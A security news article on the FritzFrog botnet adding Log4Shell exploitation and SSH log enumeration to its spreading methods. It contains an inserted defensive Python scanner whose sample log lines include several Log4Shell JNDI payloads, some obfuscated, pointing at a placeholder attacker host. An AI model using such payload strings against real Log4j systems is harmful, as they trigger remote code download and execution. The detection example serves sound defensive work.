FritzFrog Botnet Exploits Log4Shell


Botnet Looks for Vulnerable Internal Network Machines

Prajeet Nair (@prajeetspeaks) • February 2, 2024

Log4Shell strikes again. (Image: Shutterstock)

Delivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.


Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.

Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4j 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade “or longer” (see: Log4j Flaw Is ‘Endemic,’ Says Cyber Safety Review Board).

To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.

“This means that even if the ‘high-profile’ internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation,” they said.

To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.
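A defender's view of the step described above, as an added example that is not from Akamai's report or this article: a small Python scanner over constructed web-server access-log lines that collapses the nested Log4j 2 lookups commonly used to split up the `jndi` keyword, then flags any entry that still contains a JNDI lookup. All hosts and log lines are constructed; `attacker.invalid` is a placeholder, not a real indicator.

```python
import re

# Constructed sample access-log lines (hypothetical hosts). Entries 2-4 carry
# a JNDI lookup in the User-Agent field, a typical way of getting a Log4j 2
# application to log attacker-controlled text; 1 and 5 are benign.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [02/Feb/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Feb/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid:1389/a}"',
    '10.0.0.9 - - [02/Feb/2024:10:00:03 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:ldap://attacker.invalid/b}"',
    '10.0.0.11 - - [02/Feb/2024:10:00:04 +0000] "GET /api HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.invalid/c}"',
    '10.0.0.13 - - [02/Feb/2024:10:00:05 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/8.0"',
]

# An innermost ${...} lookup: its body contains no further $, { or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Collapse one lookup the way Log4j 2 would for the lookup types used to
    disguise the 'jndi' keyword; anything else is left verbatim."""
    name, _, arg = body.partition(":")
    if name.lower() == "jndi":
        return "${" + body + "}"        # keep it: this is what we detect
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    if ":-" in body:                    # ${var:-default}: unknown var -> default
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(text: str) -> str:
    """Resolve nested lookups innermost-first until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = INNER.sub(lambda m: _resolve(m.group(1)), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, still contains a JNDI lookup."""
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line number, line) for every entry that looks like a Log4Shell attempt."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_ACCESS_LOG):
        print(f"line {n}: possible Log4Shell attempt: {line}")
```

The same check applies to any log an application might write, not just HTTP access logs, since the article's point is that the payload only has to be logged by a vulnerable Log4j 2 instance to fire.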

Researchers in 2022 called FritzFrog a “new generation” of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.

It still uses brute force techniques to infect SSH servers, Akamai said, but will now “also attempt to identify specific SSH targets by enumerating several system logs on each of its victims.”
